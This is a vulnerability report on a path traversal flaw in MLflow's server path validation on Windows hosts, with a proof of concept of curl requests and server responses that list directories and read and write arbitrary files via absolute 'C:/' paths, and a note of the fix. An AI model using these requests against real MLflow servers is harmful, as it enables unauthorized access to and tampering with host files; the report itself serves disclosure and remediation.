Multiple path traversals on Windows hosts in mlflow/mlflow
Reported on
Apr 28th 2023
Description
validate_path_is_safe()
function in file /mlflow/server/handlers.py
, introduced in PR #7891 on Feb 24th, 2023 does not account for Windows absolute path format, and thus can be bypassed on MLFlow servers, running on Windows hosts, exposing them to a number of high-impact directory traversals.
The code of the affected validate_path_is_safe()
can be seen below:
_OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
def validate_path_is_safe(path):
"""
Validates that the specified path is safe to join with a trusted prefix. This is a security
measure to prevent path traversal attacks.
"""
if (
any((s in path) for s in _OS_ALT_SEPS)
or ".." in path.split(posixpath.sep)
or posixpath.isabs(path)
):
raise MlflowException(f"Invalid path: {path}", error_code=INVALID_PARAMETER_VALUE)
The function implements 3 separate checks:
- path must not contain separators other than forward slash (
/
):any((s in path) for s in _OS_ALT_SEPS)
- path must not contain relative parent directory meta symbols (
..
):".." in path.split(posixpath.sep)
- path must not be an absolute posix path:
posixpath.isabs(path)
By supplying an absolute Windows path with forward slash (/
) separators, all the above checks can be effectively bypassed:
# Python 3.9.6 on Windows 10 Pro x64 Build 19045
>>> import os
>>> import posixpath
>>> test_path = 'C:/some/abs/path'
>>>
>>> _OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
>>>
>>> any((s in test_path) for s in _OS_ALT_SEPS)
False
>>> ".." in test_path.split(posixpath.sep)
False
>>> posixpath.isabs(test_path)
False
Consequently, the attacker is able to perform directory traversals in any request handlers that use the validate_path_is_safe()
to validate the user-supplied paths.
The validate_path_is_safe()
function is used by 7 separate endpoints in mlflow/server/handlers.py
file and allows the attacker to perform these actions:
List files in directory:
_list_artifacts()#910
mapped to GET /ajax-api/2.0/mlflow/artifacts/list
_list_artifacts_mlflow_artifacts()#1707
mapped to GET /ajax-api/2.0/mlflow-artifacts/artifacts
Download arbitrary file:
get_artifact_handler()#545
mapped to GET /get-artifact
_download_artifact()#1655
mapped to GET /ajax-api/2.0/mlflow-artifacts/artifacts/PATH
get_model_version_artifact_handler()#1429
mapped to GET /model-versions/get-artifact
Write arbitrary file:
_upload_artifact()#1680
mapped to PUT /ajax-api/2.0/mlflow-artifacts/artifacts/PATH
Delete arbitrary file:
_delete_artifact_mlflow_artifacts()#1731
mapped to DELETE /ajax-api/2.0/mlflow-artifacts/artifacts
The combination of the above actions essentially gives an attacker full control over the server's file system, and allows to compromise confidentiality, integrity and availability of the user data, contained within the MLFlow server.
Proof of Concept
Setup
On Windows
Prerequisites: Installed Python3 on the PC
Install latest version of mlflow:
C:\Temp> pip install mlflow
Clone the mlflow repository into a local directory:
C:\Temp> git clone https://github.com/mlflow/mlflow
Run one of the example mlflow scripts, e.g. examples/shap/explainer_logging.py
to populate the mlruns
directory:
C:\Temp\> cd C:\Temp\mlflow\examples\shap
C:\Temp\mlflow\examples\shap> pip install scikit-learn shap matplotlib
C:\Temp\mlflow\examples\shap> python explainer_logging.py
Run the server on Windows machine, expose it to all network interfaces:
C:\Temp\mlflow\examples\shap> mlflow server --host 0.0.0.0
On Linux
Given that the Windows machine's external IP address is 10.0.0.1
$ export MLFLOW_SERVER_IP=10.0.0.1
List the existing runs in the MLFlow server. Use "experiment_ids": ["0"]
to get the default experiment. Save run_uuid
value for later use:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"experiment_ids": ["0"]}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/runs/search"
# Response:
{
"runs": [
{
"info": {
"run_uuid": "POC_RUN_ID",
...
}
}
]
}
Create new model:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"name":"POC_MODEL_NAME"}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/registered-models/create"
Create new model version by suppying the previously obtained run ID:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"name":"POC_MODEL_NAME","source":"runs:/POC_RUN_ID"}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/model-versions/create"
Exploitation
Use the obtained IDs to trigger the following LFI actions:
List files (path
value is set to "C:/" in the examples below):
Request to
/ajax-api/2.0/mlflow/artifacts/list
:# CURL request: curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/artifacts/list?run_uuid=POC_RUN_ID&path=C:/" # Response: { "root_uri": "file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/shap/mlruns/0/POC_RUN_ID/artifacts", "files": [ { "path": "../../../../../../../../../..", "is_dir": true }, { "path": "../../../../../../../../../../../Program Files", "is_dir": true }, { "path": "../../../../../../../../../../../Windows", "is_dir": true }, ... ] }
Request to
/ajax-api/2.0/mlflow-artifacts/artifacts
:# CURL request: curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/" # Response: { "files": [ { "path": "..", "is_dir": true }, ... { "path": "Program Files", "is_dir": true }, { "path": "Program Files (x86)", "is_dir": true }, { "path": "ProgramData", "is_dir": true }, { "path": "Recovery", "is_dir": true }, { "path": "System Volume Information", "is_dir": true } ] }
Write file (path
value is set to "C:/temp/poc.txt" in the examples below):
- Request to
/ajax-api/2.0/mlflow-artifacts/artifacts/PATH
:# CURL request: curl -X 'PUT' -d 'this is write poc' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts/C:/temp/poc.txt" # Response: {}
Read file (path
value is set to "C:/temp/poc.txt" in the examples below):
Request to
/get-artifact
:# CURL request: curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/get-artifact?path=C:/temp/poc.txt&run_uuid=POC_RUN_ID" # Response: this is write poc
Request to
/ajax-api/2.0/mlflow-artifacts/artifacts/PATH
. Could not be reproduced, gives the following error:# CURL request: curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts/C:/temp/poc.txt" # Response: {"error_code": "INTERNAL_ERROR", "message": "The following failures occurred while downloading one or more artifacts from ./mlartifacts: {'C:/temp/poc.txt': 'SameFileError(\"\\'C:\\\\\\\\\\\\\\\\temp\\\\\\\\\\\\\\\\poc.txt\\' and \\'C:/temp/poc.txt\\' are the same file\")'}"}
Request to
/model-versions/get-artifact
:# CURL request: curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/model-versions/get-artifact?path=C:/Temp/poc.txt&run_uuid=POC_RUN_ID&name=POC_MODEL_NAME&version=1" # Response: this is write poc
Delete file (path
value is set to "C:/temp/poc.txt" in the examples below):
- Request to
/ajax-api/2.0/mlflow-artifacts/artifacts
. Could not be reproduced, gives the following error:# CURL request: curl -X 'DELETE' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/temp/poc.txt" # Response: <!doctype html> <html lang=en> <title>405 Method Not Allowed</title> <h1>Method Not Allowed</h1> <p>The method is not allowed for the requested URL.</p>
Impact
Flawed path validation middleware can be abused by an attacker to bypass existing security controls on Windows hosts, and essentially achieve full control over the underlying host's filesystem through a number of directory traversals that allow listing, reading, writing, and deleting files using absolute Windows file paths.
The full control over the filesystem can be leveraged by an attacker to compromise confidentiality, integrity, and availability of the MLFlow user data, present on the vulnerable machine.
Occurrences
handlers.py L524
Code of the flawed validate_path_is_safe()
function. Source of the bug
@admin can we add a co-author to this report? https://huntr.dev/users/nashkersk/
Also, this vulnerability was fixed in https://github.com/mlflow/mlflow/pull/8999 by @serena-ruan
@admin Sorry I put the wrong sha, can we update with 0f2ad0236e355b0816a06670eccf69f57551fa2d ?